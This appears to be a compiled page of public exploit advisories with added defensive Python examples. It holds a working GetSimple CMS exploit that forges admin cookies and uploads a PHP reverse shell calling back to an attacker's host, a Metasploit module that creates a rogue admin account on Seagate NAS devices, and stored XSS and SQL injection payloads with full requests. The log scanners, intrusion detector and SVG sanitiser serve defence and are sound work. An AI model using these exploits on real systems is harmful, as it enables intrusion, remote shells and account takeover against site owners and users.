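Every SQL injection entry on this page is confirmed with one of three probe families: an MSSQL WAITFOR DELAY (eScan), a MySQL SLEEP() subquery (Smart School, Stackposts, Quicklancer, SPMS, LeadPro) or a boolean tautology (SCRMS, SPMS). The following is an added example, not code from any of the advisories: it scans constructed access-log lines for those probe shapes and, where the log records a response time, checks whether a time-based probe actually produced its delay, which separates a blocked scan from an endpoint that needs patching. It assumes a combined log format with an optional trailing request-time field (nginx's $request_time); POST bodies are not in access logs, so inspect_parameters() also takes a raw parameter string as a WAF or application logger would see it.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Combined log format plus an optional trailing request-time field (assumption: nginx's $request_time).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "[^"]*"(?: (?P<rt>\d+\.\d+))?$'
)

# Indicator patterns, each modelled on a payload quoted in the advisories above.
WAITFOR_RE = re.compile(r"\bwaitfor\s+delay\s*'(\d+):(\d+):(\d+)'", re.I)  # MSSQL (eScan)
SLEEP_RE = re.compile(r"\bsleep\s*\(\s*(\d+)\s*\)", re.I)                   # MySQL (sqlmap output)
TAUTOLOGY_RE = re.compile(                                                  # ' AND 8462=8462, OR 'x'='x
    r"""\b(?:or|and)\b\s*\(?\s*['"]?(\w+)['"]?\s*=\s*['"]?\1\b""", re.I)
STACKED_RE = re.compile(r";\s*(?:waitfor|select|exec|insert|update|drop)\b", re.I)  # 1;WAITFOR ...


@dataclass
class Finding:
    ip: str
    target: str                                 # decoded request target
    indicators: List[str] = field(default_factory=list)
    expected_delay: int = 0                     # seconds the probe asked the database to sleep
    observed_delay: Optional[float] = None      # logged request time, when the log has one

    @property
    def likely_vulnerable(self) -> bool:
        """A time-based probe is corroborated when the response took at least the requested delay."""
        return (self.expected_delay > 0 and self.observed_delay is not None
                and self.observed_delay >= self.expected_delay)


def decode_target(target: str) -> str:
    # Decode twice: scanners and browsers frequently double-encode quotes and spaces.
    return unquote_plus(unquote_plus(target))


def inspect_parameters(decoded: str) -> Tuple[List[str], int]:
    """Return (indicator names, requested delay in seconds) for a decoded query string or body."""
    indicators, delay = [], 0
    m = WAITFOR_RE.search(decoded)
    if m:
        h, mi, s = (int(x) for x in m.groups())
        delay = max(delay, h * 3600 + mi * 60 + s)
        indicators.append("time-based blind: WAITFOR DELAY (MSSQL)")
    m = SLEEP_RE.search(decoded)
    if m:
        delay = max(delay, int(m.group(1)))
        indicators.append("time-based blind: SLEEP() (MySQL)")
    if TAUTOLOGY_RE.search(decoded):
        indicators.append("boolean-based: x=x tautology after AND/OR")
    if STACKED_RE.search(decoded):
        indicators.append("stacked query after ';'")
    return indicators, delay


def scan_log(lines) -> List[Finding]:
    """Parse access-log lines and return one Finding per request that carries an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        indicators, delay = inspect_parameters(decoded)
        if indicators:
            rt = float(m["rt"]) if m["rt"] else None
            findings.append(Finding(m["ip"], decoded, indicators, delay, rt))
    return findings


# Constructed sample log, modelled on the eScan (MSSQL), Quicklancer and SPMS (MySQL) probes above.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/May/2023:10:01:02 +0000] "GET /ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176 HTTP/1.1" 200 812 "-" "Mozilla/5.0" 0.031',
    '10.0.0.5 - - [17/May/2023:10:01:09 +0000] "GET /ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR%20DELAY%20%270:0:5%27--&cnt=4176 HTTP/1.1" 200 812 "-" "Mozilla/5.0" 5.044',
    '10.0.0.7 - - [17/May/2023:10:02:15 +0000] "GET /php/user-ajax.php?action=searchStateCountry&dataString=deneme%27%20AND%20(SELECT%208068%20FROM%20(SELECT(SLEEP(5)))qUdx)%20AND%20%27nbTo%27=%27nbTo HTTP/1.1" 200 44 "-" "sqlmap/1.7" 0.020',
    '10.0.0.9 - - [17/May/2023:10:03:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0" 0.011',
    '10.0.0.9 - - [17/May/2023:10:03:30 +0000] "GET /php-spms/?page=services/view&id=1%27%20AND%208462=8462%20AND%20%27jgHw%27=%27jgHw HTTP/1.1" 200 5120 "-" "Mozilla/5.0" 0.040',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = "CORROBORATED" if f.likely_vulnerable else "probe"
        print(f"{f.ip} {flag} delay={f.expected_delay}s rt={f.observed_delay} :: {', '.join(f.indicators)}")
        print(f"    {f.target}")
```

In the sample, only the WAITFOR request is corroborated (5.044 s for a 5 s delay); the SLEEP(5) request returned in 20 ms, which is what a blocked or non-vulnerable endpoint looks like.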

GetSimple CMS v3.3.16 - Remote Code Execution (RCE)

# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Date: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544

import sys
import hashlib
import re
import requests
from xml.etree import ElementTree
from threading import Thread
import telnetlib

purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"


def print_the_banner():
    # The original ASCII-art banner spelling "CVE-2022-41544" did not survive
    # extraction; the text below is what remains of it.
    print(purple + '''
CCC V V EEEE 22 000 22 22 4 4 11 5555 4 4 4 4 C V V E 2 2 0 00 2 2 2 2 4 4 111 5 4 4 4 4 C V V EEE --- 2 0 0 0 2 2 --- 4444 11 555 4444 4444 C V V E 2 00 0 2 2 4 11 5 4 4 CCC V EEEE 2222 000 2222 2222 4 11l1 555 4 4
''' + reset)


def get_version(target, path):
    r = requests.get(f"http://{target}{path}admin/index.php")
    match = re.search(r'jquery.getsimple.js\?v=(.*)"', r.text)
    if match:
        version = match.group(1)
        if version <= "3.3.16":
            print(red + f"[+] the version {version} is vulnerable to CVE-2022-41544")
        else:
            print("This is not vulnerable to this CVE")
        return version
    return None


def api_leak(target, path):
    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
    if r.ok:
        tree = ElementTree.fromstring(r.content)
        apikey = tree[0].text
        print(f"[+] apikey obtained {apikey}")
        return apikey
    return None


def set_cookies(username, version, apikey):
    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': cookies
    }
    return headers


def get_csrf_token(target, path, headers):
    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
    m = re.search('nonce" type="hidden" value="(.*)"', r.text)
    if m:
        print("[+] csrf token obtained")
        return m.group(1)
    return None


def upload_shell(target, path, headers, nonce, shell_content):
    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
    payload = {
        'content': shell_content,
        'edited_file': '../shell.php',
        'nonce': nonce,
        'submitsave': 1
    }
    try:
        response = requests.post(upload_url, headers=headers, data=payload)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
        else:
            print("(-) Shell upload failed!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while uploading the shell:", e)


def shell_trigger(target, path):
    url = f"http://{target}{path}/shell.php"
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("[+] Webshell triggered successfully!")
        else:
            print("(-) Failed to visit the page!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while visiting the page:", e)


def main():
    if len(sys.argv) != 5:
        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
        return

    target = sys.argv[1]
    path = sys.argv[2]
    if not path.endswith('/'):
        path += '/'
    ip, port = sys.argv[3].split(':')
    username = sys.argv[4]

    shell_content = f"""<?php
$ip = '{ip}';
$port = {port};
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
"""

    version = get_version(target, path)
    if not version:
        print("(-) could not get version")
        return

    apikey = api_leak(target, path)
    if not apikey:
        print("(-) could not get apikey")
        return

    headers = set_cookies(username, version, apikey)

    nonce = get_csrf_token(target, path, headers)
    if not nonce:
        print("(-) could not get nonce")
        return

    upload_shell(target, path, headers, nonce, shell_content)
    shell_trigger(target, path)


if __name__ == '__main__':
    print_the_banner()
    main()
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-04-15
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.bludit.com/
# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
# Version: 3.14.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31698

SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

Save this SVG file as xss.svg.

Steps to Reproduce:
1. At first, log in to your admin panel.
2. Then go to Settings and click the Logo section.
3. Now upload the xss.svg file, so your request data will be:

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651

-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"

626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
-----------------------------15560729415644048492005010998--

4. Now open the logo image link that you uploaded. You will see the XSS pop-up.

ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)

# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Date: 2023-04-17
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: http://churchcrm.io/
# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
# Version: 4.5.4
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31699

Steps to Reproduce:
1. At first, log in to your admin panel.
2. Then click the "Admin" menu and click "CSV Import", and you will get the CSV file uploader option.
3. Now insert the XSS payload into a JPG file using exiftool or from the image properties, and then upload the JPG file.
4. You will see the XSS pop-up.

CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)

# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
# Date: 2023-02-02
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://civicrm.org
# Software Link: https://civicrm.org/download
# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)
# CVE: CVE-2023-25440

Vendor Security Advisory: CIVI-SA-2023-05

Description:
A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows an attacker to execute arbitrary web scripts or HTML. Persistent JavaScript code injected into the first/second name field of the "Add Contact" function while creating a contact is triggered once the page loads.

Steps to reproduce:
- Quick Add a contact to CiviCRM,
- Insert a payload PoC inside the field(s),
- Click on 'Add contact'.

If a user visits the dashboard, as well as the "Recently added" box, the JavaScript code will be rendered.

Zenphoto 1.6 - Multiple stored XSS

Exploit Title: Zenphoto 1.6 - Multiple stored XSS
Application: Zenphoto 1.6
Version: 1.6
Bugs: XSS
Technology: PHP
Vendor URL: https://www.zenphoto.org/news/zenphoto-1.6/
Software Link: https://github.com/zenphoto/zenphoto/archive/v1.6.zip
Date found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

###XSS-1###
Steps:
1. Create a new album.
2. Write in Album Description: <iframe src="https://14.rs"></iframe>
3. Save and view the album: http://localhost/zenphoto-1.6/index.php?album=new-album or http://localhost/zenphoto-1.6/

=====================================================

###XSS-2###
Steps:
1. Go to the user account and change the user data (http://localhost/zenphoto-1.6/zp-core/admin-users.php?page=users).
2. Change the postal code to <script>alert(4)</script>
3. If the admin user information is imported as HTML, the XSS will trigger.

PoC video: https://youtu.be/JKdC980ZbLY
##
# Exploit Title: Seagate Central Storage 2015.0916 - Unauthenticated Remote Command Execution (Metasploit)
# Date: Dec 9 2019
# Exploit Author: Ege Balci
# Vendor Homepage: https://www.seagate.com/de/de/support/external-hard-drives/network-storage/seagate-central/
# Version: 2015.0916
# CVE : 2020-6627
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/http'
require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Seagate Central External NAS Arbitrary User Creation",
      'Description'    => %q{
        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
        Subject product suffers several critical vulnerabilities such as broken access control.
        It makes it possible to change the device state and register a new admin user which is capable of SSH access.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Ege Balcı <egebalci@pm.me>' # author & msf module
        ],
      'References'     =>
        [
          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
          ['CVE', '2020-6627']
        ],
      'DefaultOptions' =>
        {
          'SSL' => false,
          'WfsDelay' => 5,
        },
      'Platform'       => ['unix'],
      'Arch'           => [ARCH_CMD],
      'Payload'        =>
        {
          'Compat' =>
            {
              'PayloadType' => 'cmd_interact',
              'ConnectionType' => 'find'
            }
        },
      'Targets'        =>
        [
          ['Auto', { 'Platform' => 'unix', 'Arch' => ARCH_CMD } ],
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Dec 9 2019",
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def check
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }
    },60)

    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
      Exploit::CheckCode::Appears
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    # First get current state
    first_state=get_state()
    if first_state
      print_status("Current device state: #{first_state['state']}")
    else
      return
    end

    if first_state['state'] != 'start'
      # Set new start state
      first_state['state'] = 'start'
      res = send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
        'ctype' => 'application/x-www-form-urlencoded',
        'data' => "info=#{first_state.to_json}"
      },60)

      changed_state=get_state()
      if changed_state && changed_state['state'] == 'start'
        print_good("State successfully changed !")
      else
        print_error("Could not change device state")
        return
      end
    end

    name = Rex::Text.rand_name_male
    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"
    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)

    print_status('Creating new admin user...')
    print_status("User: #{user}")
    print_status("Pass: #{pass}")

    # Add new admin user
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
      'ctype' => 'application/x-www-form-urlencoded',
      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' },
      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}
    },60)

    conn = do_login(user,pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods => ['password', 'keyboard-interactive'],
      :port => 22,
      :use_agent => false,
      :config => false,
      :password => pass,
      :proxy => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      fail_with Failure::Unreachable, 'Connection failed'
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def get_state
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),
      'headers' => { 'X-Requested-With' => 'XMLHttpRequest' }
    },60)

    if res && (res.code == 200 ||res.code == 100)
      return res.get_json_document
    end
    res = nil
  end
end
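From the defender's side, the module's sequence is visible in the device's web access log: a read of json_get_start_info, a POST to set_start_info, then a POST to add_edit_user, all from one client and without any preceding login. Below is an added detection example in Python; it is not part of the Metasploit module. It parses constructed combined-format access-log lines (the NAS's real log format is an assumption here) and raises one alert per successful POST to add_edit_user, rated high when the same client also POSTed set_start_info within the preceding five minutes and medium otherwise.

```python
import re
from collections import defaultdict
from datetime import datetime

# Endpoints driven by the module above; both accept unauthenticated requests on the affected firmware.
STATE_WRITE = "/index.php/Start/set_start_info"
USER_WRITE = "/index.php/Start/add_edit_user"

# Apache/nginx "combined"-style line. Assumption: the NAS logs in this format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # ignore any query string
        "status": int(m.group("status")),
    }


def find_user_creation_alerts(lines, window_seconds=300):
    """One alert per successful POST to add_edit_user.

    Severity is 'high' when the same client also POSTed set_start_info within
    window_seconds before it (the full module sequence), otherwise 'medium'.
    """
    by_ip = defaultdict(list)
    for line in lines:
        ev = parse_line(line)
        if ev and ev["status"] < 400:  # only requests the device accepted
            by_ip[ev["ip"]].append(ev)

    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e["ts"])
        state_writes = [e["ts"] for e in events
                        if e["method"] == "POST" and e["path"] == STATE_WRITE]
        for ev in events:
            if ev["method"] != "POST" or ev["path"] != USER_WRITE:
                continue
            chained = any(0 <= (ev["ts"] - t).total_seconds() <= window_seconds
                          for t in state_writes)
            alerts.append({"ip": ip, "ts": ev["ts"].isoformat(),
                           "severity": "high" if chained else "medium"})
    return alerts


# Constructed sample log (RFC 5737 documentation addresses): one client runs the full
# sequence, one only creates a user, one just browses.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Dec/2019:10:14:55 +0000] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Dec/2019:10:15:01 +0000] "GET /index.php/Start/json_get_start_info HTTP/1.1" 200 312',
    '198.51.100.7 - - [09/Dec/2019:10:15:02 +0000] "POST /index.php/Start/set_start_info HTTP/1.1" 200 18',
    '198.51.100.7 - - [09/Dec/2019:10:15:04 +0000] "POST /index.php/Start/add_edit_user HTTP/1.1" 200 41',
    '192.0.2.9 - - [09/Dec/2019:11:30:10 +0000] "POST /index.php/Start/add_edit_user HTTP/1.1" 200 41',
]

if __name__ == "__main__":
    for alert in find_user_creation_alerts(SAMPLE_LOG):
        print(alert)
```

The detection is a stop-gap. The root cause is that these handlers act on unauthenticated requests, so the durable fix is a server-side session and role check on every state-changing endpoint; until the firmware is fixed, keeping the management interface off untrusted networks and reviewing the device's user list for accounts nobody created are the practical controls.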

WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)

Exploit Title: WBCE CMS 1.6.1 - Multiple Stored Cross-Site Scripting (XSS)
Version: 1.6.1
Bugs: XSS
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date found: 03-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

###XSS-1###
Steps:
1. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/).
2. Upload a malicious SVG file.

SVG file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>

PoC request:
POST /WBCE_CMS-1.6.1/wbce/modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
Host: localhost
Content-Length: 976
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-platform: "Linux"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5u4r3pOGl4EnuBtO
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060167
Connection: close

------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="reqid"

187de34ea92ac
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="cmd"

upload
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="target"

l1_Lw
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="upload[]"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.location);
  </script>
</svg>
------WebKitFormBoundary5u4r3pOGl4EnuBtO
Content-Disposition: form-data; name="mtime[]"

1683056102
------WebKitFormBoundary5u4r3pOGl4EnuBtO--

3. Go to the SVG file (http://localhost/WBCE_CMS-1.6.1/wbce/media/SVG_XSS.svg).

========================================================================================================================

###XSS-2###
1. Go to Pages (http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages).
2. Add a page.
3. Write <script>alert(4)</script> as the page source content (URL-encoded: %3Cscript%3Ealert%284%29%3C%2Fscript%3E).

Payload: %3Cscript%3Ealert%284%29%3C%2Fscript%3E

PoC request:
POST /WBCE_CMS-1.6.1/wbce/modules/wysiwyg/save.php HTTP/1.1
Host: localhost
Content-Length: 143
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/pages/modify.php?page_id=4
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; phpsessid-6361-sid=nnjmhia5hkt0h6qi9lumt95t9u; WBCELastConnectJS=1683060475
Connection: close

page_id=4&section_id=4&formtoken=6071e516-6ea84938ea2e60b811895c9072c4416ab66ae07f&content4=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&modify=Save

4. View the page: http://localhost/WBCE_CMS-1.6.1/wbce/pages/hello.php
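Both SVG uploads on this page (Bludit's logo upload above and WBCE's elFinder media upload here) succeed because the server accepts the file as an image while the browser renders it as a document, complete with script. The following is an added example and not code from either project: a Python check that audits an uploaded SVG for active content (script and foreign-content elements, on* event handlers, javascript:/data: hrefs) and a strip variant that removes it. The sample SVG is the payload from the advisories with an onload attribute and a javascript: link added, so the test exercises the other vectors the check covers, which is more than the advisories themselves use.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
XLINK_NS = "http://www.w3.org/1999/xlink"
ET.register_namespace("", SVG_NS)
ET.register_namespace("xlink", XLINK_NS)

# Elements that execute script, embed foreign markup or rewrite attributes at
# runtime; a logo or media upload never needs any of them.
BANNED_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object",
                   "set", "animate", "animatetransform", "handler", "listener"}
DANGEROUS_SCHEMES = ("javascript:", "data:", "vbscript:")


def _local(qualified_name):
    """Strip an ElementTree '{namespace}' prefix and lower-case the name."""
    return qualified_name.rsplit("}", 1)[-1].lower()


def _dangerous_url(value):
    # Browsers ignore whitespace and control characters inside a scheme,
    # so drop them before comparing ("java\nscript:" is still javascript:).
    compact = "".join(ch for ch in value if ord(ch) > 32).lower()
    return compact.startswith(DANGEROUS_SCHEMES)


def audit_svg(data):
    """Return a list of findings describing active content; an empty list means clean."""
    root = ET.fromstring(data)
    findings = []
    if _local(root.tag) != "svg":
        findings.append("root element is <%s>, not <svg>" % _local(root.tag))
    for el in root.iter():
        name = _local(el.tag)
        if name in BANNED_ELEMENTS:
            findings.append("element <%s>" % name)
        for attr, value in el.attrib.items():
            short = _local(attr)
            if short.startswith("on"):
                findings.append("event handler %s on <%s>" % (short, name))
            elif short == "href" and _dangerous_url(value):
                findings.append("%s URL on <%s>" % (value.split(":", 1)[0], name))
    return findings


def sanitize_svg(data):
    """Return the SVG with active content removed (strip policy).

    Reject-policy callers should refuse the upload when audit_svg() is non-empty instead.
    """
    root = ET.fromstring(data)
    if _local(root.tag) != "svg":
        raise ValueError("not an SVG document")
    for parent in list(root.iter()):            # snapshot: we mutate while walking
        for child in list(parent):
            if _local(child.tag) in BANNED_ELEMENTS:
                parent.remove(child)
    for el in root.iter():
        for attr in list(el.attrib):
            short = _local(attr)
            if short.startswith("on") or (short == "href" and _dangerous_url(el.attrib[attr])):
                del el.attrib[attr]
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


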